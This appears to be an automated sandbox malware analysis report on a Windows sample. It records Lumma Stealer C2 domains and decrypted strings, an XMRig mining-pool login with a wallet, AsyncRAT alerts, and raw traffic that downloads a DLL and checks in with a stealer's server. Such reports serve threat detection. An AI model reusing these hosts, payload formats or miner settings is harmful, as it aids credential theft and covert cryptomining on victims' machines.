Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PT54FFSL7ET46RASB.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tryyudjasudqo.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: reggwardssdqw.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: relaxatinownio.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tesecuuweqo.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tendencctywop.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: licenseodqwmqn.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: keennylrwmqlw.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 21.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: hv0fRu--

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 12.2.RegSvcs.exe.245dd3ecee0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.245dd3ecee0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.378432123906.000001FB39807000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.378432123906.000001FB3983F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.378432123906.000001FB39877000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.378358238334.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.378358238334.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.378458637252.00000245DD3EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.378358238334.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 8596, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.11.30:49845 -> 142.202.242.43:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 33 69 39 58 71 65 62 44 69 36 63 58 56 31 41 45 44 4c 77 62 4a 41 78 79 32 6f 72 6d 59 6a 34 4e 62 76 4e 42 35 4c 5a 44 75 37 54 57 6f 65 39 6f 72 65 76 66 73 5a 50 42 62 33 4c 74 53 62 50 55 58 62 76 39 62 7a 55 41 62 46 5a 69 52 4e 51 32 7a 66 69 67 65 44 5a 37 61 43 57 66 39 39 2e 52 49 47 5f 43 50 55 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 34 2e 32 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43i9xqebdi6cxv1aedlwbjaxy2ormyj4nbvnb5lzdu7twoe9orevfszpbb3ltsbpuxbv9bzuabfzirnq2zfigedz7acwf99.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Found strings related to Crypto-Mining

Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD3EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD3EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: RegSvcs.exe, 0000000C.00000002.378458637252.00000245DD851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: PT54FFSL7ET46RASB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.143.156:443 -> 192.168.11.30:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.30:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.142.26:443 -> 192.168.11.30:49857 version: TLS 1.2

Source: PT54FFSL7ET46RASB.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53EEB0000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED84000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375937209528.000001F5471D0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAC73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53EEB0000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED84000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E994000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375937209528.000001F5471D0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 0000000A.00000002.375954186503.0000021EAAC73000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED0E000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375928489806.000001F53ED36000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375935522158.000001F547080000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000012.00000002.376484616059.00000180E38A0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0041B6EA FindFirstFileExW,

5_2_0041B6EA

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 45.11.229.96:56001 -> 192.168.11.30:49839
Source: Network traffic	Suricata IDS: 2055879 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop) : 192.168.11.30:63166 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.11.30:49857 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2055880 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI) : 192.168.11.30:49856 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.30:49856 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.30:49856 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.30:49857 -> 172.67.142.26:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.30:49857 -> 172.67.142.26:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: reggwardssdqw.shop
Source: Malware configuration extractor	URLs: tesecuuweqo.shop
Source: Malware configuration extractor	URLs: relaxatinownio.shop
Source: Malware configuration extractor	URLs: eemmbryequo.shop
Source: Malware configuration extractor	URLs: keennylrwmqlw.shop
Source: Malware configuration extractor	URLs: tendencctywop.shop
Source: Malware configuration extractor	URLs: licenseodqwmqn.shop
Source: Malware configuration extractor	URLs: tryyudjasudqo.shop

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 45.11.229.96 ports 39001,0,1,56001,5,6

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost

Source: global traffic

TCP traffic: 192.168.11.30:49839 -> 45.11.229.96:56001

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.142.26 172.67.142.26
Source: Joe Sandbox View	IP Address: 45.11.229.96 45.11.229.96
Source: Joe Sandbox View	IP Address: 142.202.242.43 142.202.242.43

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ALPHAONE-ASUS ALPHAONE-ASUS
Source: Joe Sandbox View	ASN Name: 1GSERVERSUS 1GSERVERSUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.11.30:53670 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.11.30:49845 -> 142.202.242.43:80

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=186ip9W4LaOLGzR6OJ3IYkt5wJVeaE38wxtYa7HWgFk-1726706524-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: eemmbryequo.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /o3M.dll HTTP/1.1Host: 2x.siConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: strompreis.ru
Source: global traffic	DNS traffic detected: DNS query: 2x.si
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: eemmbryequo.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: eemmbryequo.shop

Source: glmIOFfdMi.exe, 00000006.00000002.378478168253.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.376024062520.0000022A48A46000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378702032518.00000245E4E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegSvcs.exe, 0000000C.00000002.378702032518.00000245E4E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.glo
Source: glmIOFfdMi.exe, 00000006.00000002.378478168253.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.376024062520.0000022A48A46000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378692483802.00000245E4DE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: glmIOFfdMi.exe, 00000006.00000002.378478168253.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: glmIOFfdMi.exe, 00000006.00000002.378478168253.00000000055C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: powershell.exe, 00000008.00000002.376013750933.0000022A40758000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: glmIOFfdMi.exe, 00000006.00000002.378373436723.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, YZRVUYjilL.exe, 00000007.00000002.375920946820.000001F52E93B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.375952185699.0000022A306E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.378376086685.00000245CC611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.375952185699.0000022A3090C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
